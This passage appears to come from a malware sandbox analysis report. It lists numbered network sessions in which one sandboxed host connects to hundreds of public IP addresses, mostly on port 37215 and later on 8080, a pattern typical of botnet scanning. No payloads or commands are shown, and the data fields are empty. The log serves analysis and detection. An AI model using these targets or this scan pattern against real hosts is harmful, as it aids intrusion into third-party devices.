                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26437192.168.2.234793420.245.33.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26438192.168.2.233447484.124.215.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26439192.168.2.2336356197.131.216.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26440192.168.2.235121236.78.143.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26441192.168.2.2342656197.148.10.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26442192.168.2.2350810155.236.85.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26443192.168.2.2354144197.56.27.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26444192.168.2.2344498157.101.144.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26445192.168.2.2360784197.41.78.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26446192.168.2.2360080157.164.18.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26447192.168.2.2360250157.12.235.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26448192.168.2.235526414.96.79.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26449192.168.2.236047841.27.169.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26450192.168.2.2340494157.132.151.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26451192.168.2.23408942.3.81.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26452192.168.2.2341250197.146.81.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26453192.168.2.234958487.39.145.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26454192.168.2.2347854197.251.89.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26455192.168.2.2360324197.56.246.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26456192.168.2.234373041.65.34.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26457192.168.2.2358956197.125.195.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26458192.168.2.233848885.195.26.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26459192.168.2.235610441.197.14.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26460192.168.2.2344208157.202.7.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26461192.168.2.2338672157.27.118.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26462192.168.2.2341560183.117.132.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26463192.168.2.2359136197.67.193.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26464192.168.2.2348020157.155.211.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26465192.168.2.2333682157.70.133.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26466192.168.2.2336246157.163.144.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26467192.168.2.233792657.89.74.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26468192.168.2.2357516157.45.254.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26469192.168.2.2343050197.254.75.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26470192.168.2.2333130157.20.196.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26471192.168.2.235255641.62.45.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26472192.168.2.233813441.131.88.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26473192.168.2.233477041.8.100.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26474192.168.2.2358176157.182.226.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26475192.168.2.2337164157.35.115.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26476192.168.2.2359090197.160.15.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26477192.168.2.233840841.172.75.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26478192.168.2.233434441.51.11.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26479192.168.2.234196878.221.211.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26480192.168.2.2348932197.232.90.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26481192.168.2.2339006157.137.36.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26482192.168.2.2345882122.121.125.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26483192.168.2.235967041.233.23.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26484192.168.2.233941041.157.93.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26485192.168.2.2350250197.99.50.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26486192.168.2.2350070157.107.161.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26487192.168.2.2343046157.175.149.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26488192.168.2.2360492197.65.15.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26489192.168.2.2339966197.84.217.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26490192.168.2.2334916197.69.11.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26491192.168.2.2337104157.49.112.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26492192.168.2.2356642157.143.136.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26493192.168.2.2342136216.244.221.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26494192.168.2.2333074157.86.135.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26495192.168.2.2347898197.202.235.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26496192.168.2.2358478157.103.241.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26497192.168.2.2344988136.147.216.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26498192.168.2.2355116197.189.81.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26499192.168.2.2345142197.135.227.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26500192.168.2.234767241.175.125.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26501192.168.2.233673641.11.225.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26502192.168.2.2341090157.145.108.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26503192.168.2.2337940157.88.199.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26504192.168.2.2334688157.74.149.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26505192.168.2.234579841.229.88.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26506192.168.2.2346446197.125.238.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26507192.168.2.233276841.76.40.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26508192.168.2.2354138157.195.230.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26509192.168.2.2360000197.245.235.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26510192.168.2.233942268.92.122.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26511192.168.2.2333358157.145.166.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26512192.168.2.2342394133.168.156.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26513192.168.2.234880041.118.233.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26514192.168.2.2343726119.220.39.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26515192.168.2.233494095.193.227.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26516192.168.2.234830441.226.60.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26517192.168.2.2336316197.196.175.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26518192.168.2.2357112157.193.237.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26519192.168.2.2346014157.187.184.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26520192.168.2.235636284.116.169.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26521192.168.2.2346200197.208.226.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26522192.168.2.2346136157.5.158.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26523192.168.2.235316291.19.84.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26524192.168.2.2334298197.186.165.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26525192.168.2.234705819.132.111.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26526192.168.2.2349390160.154.176.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26527192.168.2.234899841.241.22.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26528192.168.2.233758441.221.38.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26529192.168.2.235429667.201.11.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26530192.168.2.235222641.213.15.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26531192.168.2.2348782146.223.175.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26532192.168.2.2358868197.51.94.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26533192.168.2.2340590218.124.43.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26534192.168.2.235091241.30.19.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26535192.168.2.23376322.246.71.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26536192.168.2.2334354197.75.150.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26537192.168.2.233325641.108.94.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26538192.168.2.2359862157.81.199.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26539192.168.2.2356440197.228.220.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26540192.168.2.233510041.244.73.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26541192.168.2.2343476173.104.121.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26542192.168.2.2348534157.240.11.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26543192.168.2.2344202157.32.102.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26544192.168.2.2360956197.1.205.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26545192.168.2.235061432.195.157.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26546192.168.2.2335450216.113.165.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26547192.168.2.2345428157.123.88.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26548192.168.2.234094441.41.182.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26549192.168.2.234851641.251.144.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26550192.168.2.2336824197.154.121.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26551192.168.2.2345512197.198.96.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26552192.168.2.2351074157.82.22.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26553192.168.2.2358346208.253.209.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26554192.168.2.233601441.124.121.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26555192.168.2.2353070157.64.62.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26556192.168.2.2347472157.37.225.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26557192.168.2.2336194216.38.131.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26558192.168.2.2338476157.212.117.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26559192.168.2.235270641.199.86.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26560192.168.2.233761841.210.48.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26561192.168.2.233458487.174.3.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26562192.168.2.234665241.160.2.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26563192.168.2.2346948197.127.167.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26564192.168.2.233454041.198.46.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26565192.168.2.235051077.85.66.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26566192.168.2.235539841.159.222.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26567192.168.2.2357034157.211.249.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26568192.168.2.234914451.206.99.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26569192.168.2.2346248157.18.38.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26570192.168.2.236047841.78.158.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26571192.168.2.235685641.203.11.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26572192.168.2.235056641.213.0.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26573192.168.2.2337158157.101.87.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26574192.168.2.234190841.233.88.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26575192.168.2.2348012157.176.129.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26576192.168.2.2344500191.236.195.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26577192.168.2.2334116197.111.215.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26578192.168.2.2348644197.202.169.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26579192.168.2.2346196157.31.92.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26580192.168.2.236044870.227.119.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26581192.168.2.2357510197.145.239.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26582192.168.2.2346136197.76.126.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26583192.168.2.2357976157.210.68.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26584192.168.2.2349860169.2.119.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26585192.168.2.2340276176.149.153.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26586192.168.2.233396641.118.160.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26587192.168.2.235182040.139.218.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26588192.168.2.2334972197.189.7.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26589192.168.2.235168841.122.137.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26590192.168.2.2355446197.189.169.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26591192.168.2.2350396197.155.186.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26592192.168.2.2355174157.18.145.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26593192.168.2.2349598157.175.160.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26594192.168.2.234641841.163.33.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26595192.168.2.2344880109.143.55.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26596192.168.2.235961489.43.109.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26597192.168.2.2353652212.60.229.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26598192.168.2.235435296.157.169.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26599192.168.2.2346598168.221.215.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26600192.168.2.234567243.174.54.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26601192.168.2.2344944193.140.52.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26602192.168.2.2336058111.72.56.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26603192.168.2.2351084140.80.46.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26604192.168.2.2346950201.222.44.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26605192.168.2.233956235.12.37.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26606192.168.2.2355088181.25.2.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26607192.168.2.234786064.90.12.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26608192.168.2.2348046105.124.180.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26609192.168.2.23461982.230.119.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26610192.168.2.235095060.240.164.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26611192.168.2.234035284.0.94.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26612192.168.2.2356746216.51.62.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26613192.168.2.2338826134.106.124.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26614192.168.2.2359606144.124.205.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26615192.168.2.2354974205.249.94.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26616192.168.2.233385273.52.86.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26617192.168.2.233948085.251.116.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26618192.168.2.2350948116.55.30.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26619192.168.2.2339040134.138.76.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26620192.168.2.234015650.185.29.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26621192.168.2.23519504.85.246.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26622192.168.2.2348786200.45.46.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26623192.168.2.2348038162.57.127.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26624192.168.2.234219835.235.210.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26625192.168.2.2350398151.173.248.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26626192.168.2.235316083.43.93.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26627192.168.2.2347680114.76.22.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26628192.168.2.234041492.162.163.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26629192.168.2.233357462.31.61.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26630192.168.2.234510412.219.148.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26631192.168.2.2339718174.71.139.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26632192.168.2.2337984143.210.90.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26633192.168.2.2351588130.235.134.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26634192.168.2.2354574139.178.107.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26635192.168.2.234807868.5.237.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26636192.168.2.2342682137.133.242.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26637192.168.2.2359594141.47.48.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26638192.168.2.234301048.131.247.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26639192.168.2.235513269.227.157.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26640192.168.2.2337910113.102.96.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26641192.168.2.235932840.127.40.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26642192.168.2.234274689.210.252.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26643192.168.2.2337470211.178.20.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26644192.168.2.2335160167.80.81.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26645192.168.2.2337658140.160.120.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
